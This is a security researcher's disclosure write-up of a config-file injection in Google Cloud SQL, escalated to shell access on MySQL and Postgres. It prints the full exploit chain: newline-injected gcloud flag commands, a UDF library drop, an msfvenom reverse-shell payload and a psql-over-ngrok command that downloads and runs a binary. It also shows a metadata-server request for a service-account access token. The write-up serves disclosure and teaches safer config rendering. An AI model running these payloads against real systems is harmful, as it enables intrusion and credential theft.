Dropping a shell in Google’s Cloud SQL (the speckle-umbrella story)


When I read write-ups about security research, additional attack vectors sometimes pop up in my mind, like "hmm, okay, this is interesting, but do they have a protection measure in place against that attack?" In this case the original research is called "How to contact Google SRE: Dropping a shell in Cloud SQL". When I publish an article like this, I usually focus on the results only; this time I tried to summarize my failed attempts as well, and how I finally found the security holes in the database service.

Finding the flaw

My original concern was about the 'root'@'%' account, which normally comes with SUPER privileges in MySQL, so I decided to look into how Google protects such a powerful account on their managed platform. The short answer: despite the name, the account doesn't have full permissions.

This account has (some level of) write permission in the mysql database. One of my ideas was to insert a row into the mysql.plugin table directly (instead of using the INSTALL PLUGIN statement) and then try to mount a directory traversal attack. This would actually have required a MySQL-level vulnerability, and I confirmed quickly in my local test environment that MySQL loads plugins only from plugin_dir (validation of the input isn't limited to INSTALL PLUGIN statements). Then I also found that on GCP I don't even have write permission on this table, enforced by this special setting:

require_super_for_system_table_writes: event,func,plugin,proc,heartbeat,db,user,tables_priv

Then I tried to execute additional stacked statements via the CSV export. As expected, this didn't work (errorType: "DATA_FETCHING_EXCEPTION").

I kept experimenting with the other Cloud features; "database flags" looked interesting. This is a long list of settings that you cannot modify directly, but which you can change via the official tooling. The supported ones can be queried this way:

gcloud sql flags list --database-version=MYSQL_5_7

The requiresRestart attribute implied that these changes are dispatched to the database server on the fly (and probably also persisted somehow). The vast majority of these settings have type constraints (int, bool), and the string ones usually enforce a value from an enum. While building on biases is usually not a good idea, I didn't bother testing the correctness of the server-side check.

There were, however, a few string settings where the value was unrestricted (at least according to the output of the command above). In the case of MySQL, they are:

I knew certain database platforms have limitations regarding parameterized statements, and I was uncertain whether it was possible to rely on that in SET GLOBAL setting_name=value statements. I started sending typical SQLi payloads and found nothing special. I also tried sending a multiline SQL statement for init_connect, and encountered a weird error message:

radimre83@cloudshell:~$ gcloud sql instances patch test "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a;\nSELECT CURRENT_USER() AS b')"

ERROR: gcloud crashed (ValueError): Invalid header value b'/usr/bin/../lib/google-cloud-sdk/lib/gcloud.py sql instances patch test --database-flags=init_connect=SELECT CURRENT_USER() AS a;\nSELECT CURRENT_USER() AS b'

What? I doubted my payload would be submitted as a header. As this looked suspicious, I didn't stop. The --log-http parameter of the CLI quickly confirmed this error was thrown on the client side, without actually sending any request to the service. Reviewing the source code, I found this check wasn't even implemented in Google's domain, but in the official Python HTTP client library (wtf, still). You can turn it off here:

$ diff /usr/lib/python3.7/http/client.py.orig /usr/lib/python3.7/http/client.py
< raise ValueError('Invalid header value %r' % (values[i],))
> pass # raise ValueError('Invalid header value %r' % (values[i],))
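The stdlib origin of the error is easy to confirm locally: http.client validates header values before anything touches the network, so the ValueError fires even for a host that doesn't exist (the hostname below is a placeholder):

```shell
# The check that rejected the newline lives in Python's standard library
# (http.client), not in gcloud's own code; header values containing \n are
# refused before any request is sent.
python3 -c '
import http.client
c = http.client.HTTPConnection("example.invalid")
c.putrequest("GET", "/")
try:
    c.putheader("X-Test", "a\nb")
    print("accepted")
except ValueError:
    print("rejected client-side")
'
```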

Resending the payload, this time the server threw an INTERNAL_ERROR. While this looked promising, I didn't manage to make further progress here for a while, so I switched to targeting Postgres instead. I started with understanding the permissions and concluded that cloudsqlsuperuser, again despite the name, is not running with full permissions:

Both read and write access to pg_authid (the underlying catalog of the role attributes) were rejected:

postgres=> insert into pg_authid (rolsuper) values ('t');

ERROR: permission denied for relation pg_authid

Reviewing the output of the SHOW ALL statement, I saw the base directory of the Postgres server (this will be important later):

config_file | /pgsql/data/postgresql.conf

Then, by querying CURRENT_USER, I identified that the import/export feature of the platform carries out the operation as cloudsqlimportexport, a user with the same permissions as the default postgres user. Just like with MySQL, I learned more about the built-in security controls of the DBMS:

postgres=> ALTER USER cloudsqladmin WITH PASSWORD 'hu8jmn3';

ERROR: must be superuser to alter superusers

postgres=> ALTER USER cloudsqlreplica WITH PASSWORD 'hu8jmn3';

ERROR: must be superuser to alter replication users

Regarding the “database flags”, there were two “unrestricted” ones here as well:

Reviewing the emitted lines in the Logs Explorer of GCP, I found that my database flag change requests were not converted into SET statements (unlike with MySQL); instead, the following two interesting ones showed up:

2021-01-21 12:44:51.719 UTC [407]: [2-1] db=cloudsqladmin,user=cloudsqladmin LOG: statement: SELECT sourcefile, sourceline, name, setting, error from pg_catalog.pg_file_settings where applied='f'

2021-01-21 12:44:51.740 UTC [408]: [2-1] db=cloudsqladmin,user=cloudsqladmin LOG: statement: SELECT pg_catalog.pg_reload_conf()

Conclusion: the platform probably makes changes at the config file level, then reloads the database server (via that function) if the syntax is correct. Thinking over all the conclusions I had made so far, I started getting excited. We might have a config file injection at this point!

To verify, I sent a patch request with this payload: "pgaudit.role=ffff\nenable_sort = off"

And the change was reflected indeed (the default value of enable_sort is on):

postgres=> show enable_sort;

 enable_sort
-------------
 off
(1 row)
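Mechanically, the injection is simple: if the control plane renders each flag as a plain key = value line, a newline embedded in the value becomes a second, attacker-chosen directive. A minimal sketch of such a (hypothetical) rendering step:

```shell
# Hypothetical model of the config rendering step: a flag value written
# verbatim into postgresql.conf smuggles in a second directive.
value='ffff
enable_sort = off'                            # value submitted for pgaudit.role
printf 'pgaudit.role = %s\n' "$value" > postgresql.conf.demo
cat postgresql.conf.demo
```

The demo file ends up containing two directives instead of one; a renderer that rejected or escaped newlines would have kept everything on a single (invalid) line.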

Then I quickly executed one more test, this time targeting cloudsql.supported_extensions, a setting one normally has no permission to modify and which is not exposed as a database flag (unlike enable_sort):

postgres=> set cloudsql.supported_extensions = foobar;

ERROR: permission denied to set parameter "cloudsql.supported_extensions"

The default value is:

bloom:1.0, btree_gin:1.0, btree_gist:1.2, chkpass:1.0, citext:1.3, cube:1.2, dblink:1.2, dict_int:1.0, dict_xsyn:1.0, earthdistance:1.1, fuzzystrmatch:1.1, hstore:1.4, intagg:1.1, intarray:1.2, ip4r:2.4, isn:1.1, lo:1.1, ltree:1.1, pg_buffercache:1.2, pg_prewarm:1.1, pg_stat_statements:1.4, pg_trgm:1.3, pgaudit:1.1.2, pgcrypto:1.3, pgrowlocks:1.2, pgstattuple:1.4, plpgsql:1.0, postgis:2.3.0, postgis_tiger_geocoder:2.3.0, postgis_topology:2.3.0, prefix:1.2.0, sslinfo:1.2, tablefunc:1.0, tsm_system_rows:1.0, tsm_system_time:1.0, unaccent:1.1, uuid-ossp:1.1, postgres_fdw:1.0, pg_freespacemap:1.2, pg_visibility:1.2, pageinspect:1.5, pgfincore:1.2, pg_repack:1.4.4, hll:2.12, plproxy:2.9.0

Btw, this setting restricts which Postgres extensions one can load! So the final command looked like this:

gcloud sql instances patch test-pg "$(printf -- '--database-flags=pgaudit.role=ffff\ncloudsql.supported_extensions = bloom:1.0')"

The command worked and the cloudsql.supported_extensions setting was indeed changed as I wanted. I knew this attack primitive had great potential, but the impact so far was still low. However, being afraid of Ezequiel racing me :), I decided to file a ticket to the VRP team reporting my current progress.

Gaining a shell on MySQL

Shortly after, I switched back to MySQL and constructed a new patch command, this time with correct syntax. I targeted the secure_file_priv setting, which you don't have access to as 'root'@'%':

mysql> set global secure_file_priv = "/mysql/tmp/something";
ERROR 1238 (HY000): Variable 'secure_file_priv' is a read only variable

The default value is /mysql/tmp/.

The command that was finally accepted without an INTERNAL_ERROR:

gcloud sql instances patch test "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a\nsecure_file_priv=/mysql/tmp/something')"

In the case of MySQL, changes are dispatched as a MySQL query first, so my payload was reflected this way:

I restarted the instance (gcloud sql instances restart test), but it didn't come back. Checking the Logs Explorer, I found the reason:

2021-01-21T14:25:59.751089Z 0 [ERROR] Failed to access directory for --secure-file-priv. Please make sure that directory exists and is accessible by MySQL Server. Supplied value : /mysql/tmp/something

Awesome! MySQL was affected after all. I sent an update to the VRP team. The day after, my report was triaged and forwarded to VRP with priority P3 (which I think means something like "unless you have anything better to do"). Nevermind :)

I kept researching the topic. I knew the CSV export feature was still running as 'root'@'localhost' (which is not the same as 'root'@'%'), so this account did have permission to drop files in the secure_file_priv directory. The plan was of course to change plugin_dir to the same directory and load native code from that location somehow. I could prepare the configuration with this command:

gcloud sql instances patch test--my "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a\nplugin_dir=/mysql/tmp/')"

Making progress came with a lot of trial and error, documentation reading, and understanding the additional security controls (e.g. the system_user table). The database import process turned out to be completely low-privileged, as this query shows:

2021-01-21T21:28:21.202207Z cloudsqlimport[cloudsqlimport] @ localhost [] 2012 777276492 Query LOAD DATA LOCAL INFILE 'Reader::loaddata' INTO TABLE `test` CHARACTER SET 'utf8mb4' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' ESCAPED BY '\"' LINES TERMINATED BY '\n'

I didn't understand this at first (a user without file permissions, still using a LOAD DATA statement), but the LOCAL INFILE feature of MySQL explained it perfectly ("If LOCAL is specified, the file is read by the client program on the client host and sent to the server").

The SQL import feature was running with effectively the same privileges as the 'root'@'%' user I already had access to.

The CSV export process, however, was running with high privileges, but I was limited to one single SELECT query. I started reviewing the official MySQL documentation to see whether it was possible to call a data-change operation as a subquery, or anything similar.

I found this one:

MySQL permits a subquery to refer to a stored function that has data-modifying side effects such as inserting rows into a table. For example, if f() inserts rows, the following query can modify data:

SELECT ... WHERE x IN (SELECT f() ...);

This behavior is an extension to the SQL standard. In MySQL, it can produce nondeterministic results because f() might be executed a different number of times for different executions of a given query depending on how the optimizer chooses to handle it.

Perfect, stored procedures came to the rescue! I put together a test one quickly, and faced the next challenge:

mysql> source stored-test.sql

ERROR 1419 (HY000): You do not have the SUPER privilege and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)

So a restriction once again. Relevant docs here:

To relax the preceding conditions on function creation (that you must have the SUPER privilege and that a function must be declared deterministic or to not modify data), set the global log_bin_trust_function_creators system variable to 1.

The setting was turned off indeed, but I could flip it by using the vulnerability once again:

gcloud sql instances patch test--my "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a\nplugin_dir=/mysql/tmp/\nlog_bin_trust_function_creators=ON')"

I could finally create stored procedures:

My first attempt to escalate my privileges was using this function:

Using my account in the shell:

mysql> select NonDet();

ERROR 1227 (42000): Access denied; you need (at least one of) the SUPER privilege(s) for this operation

This did not work; even root@localhost during the CSV export got the very same error back:

Error 1045: Access denied for user 'root'@'%' (using password: NO)

I was a bit lost at this point and didn't understand why the error message reported 'root'@'%' (my account) while the query was clearly executed by 'root'@'localhost'. Inspecting the definition of the NonDet function, I finally understood the reason: the function was executed as the definer (me), not as the privileged user. I tried adding the DEFINER clause ('root'@'localhost'), but I couldn't create the function that way (it required SUPER privileges).

Reading the relevant documentation, I found that MySQL supports the SQL SECURITY INVOKER clause in the definition, and the DBMS allowed me to create the stored procedure in this special mode! After the CSV export process called the NonDet function, the result of the UPDATE statement above was finally reflected:

Still (after restarting the server since FLUSH couldn’t be used inside the procedure), I didn’t gain access to the file operations:

mysql> SELECT "foobar" INTO DUMPFILE '/mysql/tmp/dumpfile.test';

ERROR 1045 (28000): Access denied for user 'root'@'%' (using password: YES)

Weird; probably because of the extra separation with the system_user table. After some further trial and error, I decided to choose the easier way and dropped the file via the stored procedure itself. I downloaded a UDF binary from here, and converted it into a stored procedure (by writing a few-line script for this purpose). It looked something like this:
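The conversion script itself isn't shown in this copy; a sketch of the idea (file names are illustrative, and in the real chain the emitted statement was wrapped in the SQL SECURITY INVOKER procedure, since 'root'@'%' could not run it directly) is to hex-encode the shared object and emit a single statement that recreates it on the server side:

```shell
# Sketch of the few-line conversion: hex-encode the UDF library and emit one
# SELECT ... INTO DUMPFILE statement that recreates it byte-for-byte.
printf 'ELF-stub' > lib_mysqludf_sys2.so   # stand-in for the real library
hex=$(od -An -v -tx1 lib_mysqludf_sys2.so | tr -d ' \n')
printf "SELECT 0x%s INTO DUMPFILE '/mysql/tmp/lib_mysqludf_sys2.so';\n" "$hex" > drop.sql
cat drop.sql
```

MySQL treats 0x... literals as binary strings, and INTO DUMPFILE writes them out without any conversion, which is what makes this single-statement dropper possible.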

Dropping the file succeeded, so I could try creating the function as the last step, but it turned into yet another failure:

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';

ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys2.so' (errno: 0 /mysql/tmp/lib_mysqludf_sys2.so: wrong ELF class: ELFCLASS32)

Anyway, I knew this was just a matter of some additional massaging at this point :) I installed libmysqld-dev, recompiled the source code, repeated all the steps to get it onto the MySQL file system, and everything was finally working! But it was still really uncomfortable, as the commands were executed blindly, without any output, and the image still didn't contain any useful utilities:

As a next step, I generated a reverse TCP shellcode using Metasploit:

msfvenom -p linux/x64/shell_reverse_tcp -f elf --smallest --out reverse.bin LHOST= LPORT=51111

I tried dropping this file with my existing UDF function:

SELECT sys_exec("printf '\x7f\x45\x4c…' > /mysql/tmp/revshell.bin");

But this didn't work, and I didn't understand why at that point. I had to go through the stored procedure file-dropping chain once again, and I finally gained a remote shell:

Later I found that neither printf had support for \x expressions, nor did echo support the extended syntax (-e). Experimenting with the options here was important, as I knew I would still need to find a way to accomplish the same on Postgres ;) I was able to leverage sed to drop files with a syntax like this:

echo -n x | sed 's/./\\x20/' > /mysql/tmp/single-space.txt
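The trick relies on sed's \xHH escapes in the replacement text (a GNU extension); the doubled backslashes in the command above presumably account for one extra unescaping layer on the way to the target. A quick local check, together with the POSIX octal printf alternative:

```shell
# GNU sed interprets \xHH escapes in the replacement, so one matched
# character can be rewritten into arbitrary bytes:
out=$(printf x | sed 's/./\x41\x42\x43/')
echo "$out"                 # ABC
# printf's \x escapes are a non-POSIX extension (hence the failure in the
# image); octal escapes are the portable equivalent:
printf '\101\102\103\n'     # ABC
```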

But let's focus on MySQL for one more second! The instance was still running in the host's network context, but with default Docker capabilities, as a non-root user (so abusing the cloud agent to escape from Docker was not possible anymore).

The docker image that belongs to the service:

cat /var/lib/cloudsql/noncritical/*.release


The project ID that the managed identity was assigned to:

wget http://metadata.google.internal/0.1/meta-data/project-id -O -

Connecting to metadata.google.internal (…)

writing to stdout

speckle-umbrella-48- 100% |********************************| 19 0:00:00 ETA

The permissions of this identity:

wget http://metadata.google.internal/0.1/meta-data/service-accounts/ -O -

Connecting to metadata.google.internal (…)

writing to stdout





wget http://metadata.google.internal/0.1/meta-data/service-accounts/p747024478252-pi0jvj@gcp-sa-cloud-sql.iam.gserviceaccount.com/acquire -O -

Connecting to metadata.google.internal (…)

writing to stdout

{"accessToken":"…","expiresAt":1611414384,"expiresIn":3344}- 100% |********************************| 275 0:00:00 ETA

written to stdout

And the permissions of the service account (https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=...):


{
  "issued_to": "103047181598510924038",
  "audience": "103047181598510924038",
  "scope": "https://www.googleapis.com/auth/bigquery https://www.googleapis.com/auth/cloudimagemanagement https://www.googleapis.com/auth/pubsub https://www.googleapis.com/auth/sqlservice.agent https://www.googleapis.com/auth/dataaccessauditlogging https://www.googleapis.com/auth/cloudkms https://www.googleapis.com/auth/servicecontrol https://www.googleapis.com/auth/devstorage.full_control",
  "expires_in": 3144,
  "access_type": "online"
}
Btw later I realized the log_bin_trust_function_creators setting was actually exposed as a database flag, so the technique I found above to escalate my privileges to SUPER was actually an independent security issue.

Now let’s switch back to Postgres again.

Gaining a shell on Postgres

This flaw could be exploited by a malicious user of GCP, in order to access restricted features of Postgres and potentially execute arbitrary code on the VM with the privileges of the service account of the managed service. This might be not feasible without a file dropping primitive, but based on [this article] probably not impossible. I keep researching the impact and try turn this into something more powerful (thinking in combining this with the GCS import feature), but wanted to report this to you guys before someone else races me.

This is a paragraph from my original report. Without a file dropping primitive (which I didn't have here), it might not be possible to turn a config file injection flaw into code execution. After reviewing the documentation of the Postgres server configuration options, I found a couple of additional candidates for executing commands without the need to save a file first via SQL queries. This required familiarizing myself with administering Postgres a little bit more, so I spun up a local test environment. In the Docker Hub era, this is as easy as running a command :)

So the mentioned settings are:

- archive_cleanup_command

- archive_command

- recovery_end_command

- restore_command

- ssl_passphrase_command

The restore/recovery ones did not seem feasible: we probably don't have much control over the destination Postgres server when a point-in-time snapshot is being restored, as they need a new instance to be created. At least this was my understanding, but I didn't test this route as the archive_command path worked. After some local trial and error, I found the following set of Postgres options offering a convenient way of executing shell commands:

archive_mode = on

wal_level = replica

archive_command = 'any shell command goes here'


Knowing that the Docker image the Postgres server runs in is bare, I first established a way to save arbitrary binary content:

archive_command = 'echo -n x|sed "s/./\\x20\\x20/" > /tmp/proof.txt'

As you will see later, I didn't use this at the end of the day :)

At this point I was experimenting with a command like this:

gcloud sql instances patch test-pg "$(printf -- '--database-flags=pgaudit.role=ffff\narchive_command=\x27/usr/bin/id\x27')"

The command executed successfully, but the changes were not reflected; more precisely, they were probably overridden by another layer:

wal_level | replica

archive_command | /utils/replication_log_processor -disable_log_to_disk -action=archive -file_name=%f -local_file_path=%p

archive_mode | on

I was thinking about alternatives. How about assigning a custom private key and getting a command executed by the passphrase input callback? How about overriding log_directory/log_filename and log_line_prefix to drop a binary executable, then overriding dynamic_library_path to log_directory and LOADing the function? I was also reviewing the documentation of the available plugins, hoping that some of them would help accomplish my goal. Btw, if you execute SELECT * FROM pg_available_extensions, you will see a couple of plugins that you cannot load due to not being present in cloudsql.supported_extensions. Two of them are proprietary:

cloudsql_stat | 1.0 | | Google Cloud SQL statistics extension

google_insights | 1.0 | | Google extension for database insights

pgtap | 1.1.0 | | Unit testing for PostgreSQL

pglogical | 2.3.1 | | PostgreSQL Logical Replication

Instead, I started investigating why and how those archive_command options had been configured at all. The answer was simple: the database was created with point-in-time recovery support turned on. Without that feature, archive_mode was off and archive_command was empty.

Unfortunately the archive_mode and wal_level settings cannot be changed without restarting the server, and I knew Google performs this verification when setting flags; this might have broken the attack idea. However, I had some (more) luck at this point: the following command was finally both accepted and reflected after manually restarting the database server:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100001,pgaudit.role=ffff\narchive_mode=on\narchive_command=\x27/usr/bin/id\x27')"

Note, I added autovacuum_freeze_max_age because, according to the flag description, it required restarting the server, and I hoped that this way the warnings emitted due to my "malicious" changes of archive_command would be ignored. Later I realized I was overly cautious; Google ignored that warning anyway.

Then I tried dropping my reverse shellcode using the sed magic described earlier. My first attempt failed with INTERNAL_ERROR; I thought it was because the escaped command was too long, so I split it into 3 parts. It looked something like this:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100004,pgaudit.role=f4\narchive_mode=on\narchive_command=\x27echo -n x|sed "s/./\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc2\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\xc7\\\\xa7\\\\xa8/" >/pgsql/s2\x27')"
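The splitting step can be scripted; below is a hypothetical generator (chunk size, file names, and the use of printf instead of echo -n are my own choices, not the ones from the report) that hex-encodes a payload and emits one sed-based dropper command per piece:

```shell
#!/bin/sh
# Hypothetical generator for the chunked upload commands described above.
printf 'Hello\177World' > payload.bin   # small stand-in for revshell.bin
split -b 60 payload.bin part_           # 60-byte chunks (illustrative size)
n=1
for f in part_*; do
  # hex-encode the chunk, then turn "48656c..." into "\x48\x65\x6c..."
  hex=$(od -An -v -tx1 "$f" | tr -d ' \n')
  esc=$(printf '%s' "$hex" | sed 's/../\\x&/g')
  printf 'printf x|sed "s/./%s/" >/pgsql/s%d\n' "$esc" "$n"
  n=$((n+1))
done > upload.cmds
cat upload.cmds
```

Replaying the generated commands (with /pgsql swapped for a writable directory) reassembles the exact original bytes, which is what the later cat s1 s2 s3 step relied on.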

After the 3 parts were (I thought) uploaded, I tried executing the binary by running:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100005,pgaudit.role=f5\narchive_mode=on\narchive_command=\x27cd /pgsql;cat s1 s2 s3 > s;chmod +x s;./s\x27')"

But I encountered INTERNAL_ERROR again. Later I understood it was because the server side did some kind of text manipulation on the received data; I believe it split my input by the semicolon character. However, I didn't know this at that point, so I had to find another way to proceed once again. I was looking for commands that are present in this Docker image and could connect to a remote server over the network, read some data, and either save it to a file or at least output it to stdout. Netcat is obviously not present, and bash did not support /dev/tcp, as I had confirmed earlier. Then I suddenly realized psql is a perfect fit and is most probably present in the image.

So I launched a Postgres server on my side again and exposed it with ngrok. After some trial and error I concluded it is not really easy to produce pure binary output with psql, so I turned to using base64. (I knew the base64 binary was present in the MySQL image, so I hoped it was in the Postgres one as well.)

The commands I used to prepare the source data in my Postgres server:

postgres=# create table x (d VARCHAR(1000));

postgres=# insert into x values (ENCODE(pg_read_binary_file('/tmp/revshell.bin'),'base64'));

I tested whether I could indeed save the binary file correctly:

psql -h4.tcp.ngrok.io -p10800 -Upostgres -tqA -c "SELECT d FROM x"|base64 -d>/tmp/revshell.test
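The transport scheme itself is easy to check locally without psql or ngrok (file names are mine): base64 survives any text-only channel and decodes back byte-identically:

```shell
# Local check of the base64 transport idea: encode a binary blob, ship it as
# text (here just a file, standing in for the psql query result), decode it
# back, and verify the round trip is byte-exact.
head -c 512 /dev/urandom > revshell.demo
base64 revshell.demo > transported.b64
base64 -d transported.b64 > revshell.out
cmp revshell.demo revshell.out && echo "round trip OK"
```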

This way, the complete gcloud command was constructed:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=pgaudit.role=f8\narchive_mode=on\narchive_timeout=1s\narchive_command=\x27psql -h4.tcp.ngrok.io -p17150 -Upostgres -tqA -c "SELECT d FROM x"|base64 -d>/pgsql/r && chmod +x /pgsql/r && /pgsql/r\x27')"

And it finally worked!

The GCP project the service belonged to was called speckle-umbrella-pg-3. The service account was running with the same privileges as in the MySQL case, including devstorage.full_control. Based on the point-in-time recovery feature and this permission, I believe I could have accessed data of other customers stored in their Postgres databases by downloading the WAL files from the project's Cloud Storage buckets. However, I didn't verify this, as interpretations of the limits of white hat hacking usually differ.

Later, after Google pinged me for some clarification, I simplified this attack a little bit by using the "local" Postgres instance itself as the source of the binary payload. The commands look something like this:

postgres=> create table x (d VARCHAR(1000));
postgres=> insert into x values ('your-base64-payload');

And to trigger its execution:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=pgaudit.role=f8\narchive_mode=on\narchive_timeout=1s\narchive_command=\x27psql -h127.0.0.1 -Ucloudsqladmin -d postgres -tqA -c "SELECT d FROM x"|base64 -d>/pgsql/r2 && chmod +x /pgsql/r2 && /pgsql/r2\x27')"

Post attempts

There were some interesting services listening on the loopback network interface on the MySQL host:

tcp 0 0* LISTEN -

tcp 0 0 :::8080 :::* LISTEN -

Both of these were plain HTTP services. Using a Meterpreter tunnel, I executed dirb against both of them, but couldn't find anything other than 404s.

While reading various docs about MySQL, I came across the FEDERATED table engine. I knew that if I was able to connect to the database server through the loopback interface or the unix socket, I could authenticate as the "real" root user (which is a passwordless account), so this could have been an alternate way to escalate privileges to the super account. However, the table engine was not supported.

I also played around a bit with the clone plugin (which seemed to be another interesting attack vector), but found that the permissions, as configured on GCP by default, leave no space for abuse.

My third idea yielded some success, though the impact was completely different than I expected. A combination of some of the techniques described in this article caused a segmentation fault on the MySQL server side. Under the hood, this was a simple null pointer dereference, so the only impact is denial of service. I reported it to the vendor.

I also checked some of the XML-related functions briefly; the idea was to send HTTP requests to the metadata server via XXE or similar. This didn't work.

I also tried mounting similar attacks against Postgres. E.g. I tested the dblink and CREATE SERVER features (I even reviewed their source code); the goal was to connect to the same Postgres instance, but as the passwordless cloudsqladmin account via localhost. Postgres featured a built-in security measure:

postgres=> SELECT dblink_connect('dbname=postgres host= user=cloudsqladmin password=foobar options=-csearch_path=');

ERROR: password is required

DETAIL: Non-superuser cannot connect if the server does not request a password.

HINT: Target server's authentication method must be changed.


I had a similar finding many years before (CVE-2016-4476, a wpa_supplicant issue which could be turned into privilege escalation on Android). I think the lesson is simple: if you generate plain old unstructured config files (not YAML/JSON or similar), you need to pay extra attention to restricting the input, or to escaping properly while rendering it.
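A config writer can close this class of hole with a one-line check; below is a minimal sketch (a hypothetical validator, not Google's actual fix) that rejects flag values containing an embedded newline before they ever reach the file:

```shell
#!/bin/sh
# Minimal mitigation sketch: reject any flag value containing a newline
# before rendering it into an unstructured config file.
nl=$(printf '\nx'); nl=${nl%x}            # a literal newline character
flag_value_ok() {
  case $1 in
    *"$nl"*) return 1 ;;                  # embedded newline: reject
    *)       return 0 ;;
  esac
}
flag_value_ok 'ffff' && echo "ffff: ok"
flag_value_ok 'ffff
enable_sort = off' || echo "injection attempt: rejected"
```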

For fellow researchers: if you find something like this, don’t stop at opening the shell.


Timeline

- Jan 21, 2021 02:36PM – Postgres config file injection found and reported

- Jan 21, 2021 03:32PM – MySQL config file injection found, update to VRP sent

- Jan 22, 2021 10:46AM – triage complete, priority P3 assigned

- Jan 22, 2021 02:33PM – Reported a fully working code execution in MySQL

- Jan 23, 2021 10:52PM – MySQL RCE reported

- Jan 24, 2021 10:21PM – Highlighting the log_bin_trust_function_creators privesc is actually a standalone issue, could be mounted independently

- Jan 24, 2021 11:39PM – Postgres RCE reported

- Jan 28, 2021 01:39PM – A follow up question by Google

- Jan 28, 2021 09:10PM – Clarifying some bits

- Feb 5, 2021 11:35PM – Priority changed to P1

- Feb 7, 2021 06:09PM – 🎉 Nice catch! Severity S1.

- Feb 16, 2021 06:20PM – "we decided that it does not meet the bar for a financial reward" … "We don't consider intra VM issues in Cloud SQLs as security vulnerabilities (VM is a security boundary there, not the SQL engine)."

- Feb 16, 2021 10:38PM – Fixed already…


Imre Rad




Software developer daytime, security researcher in freetime
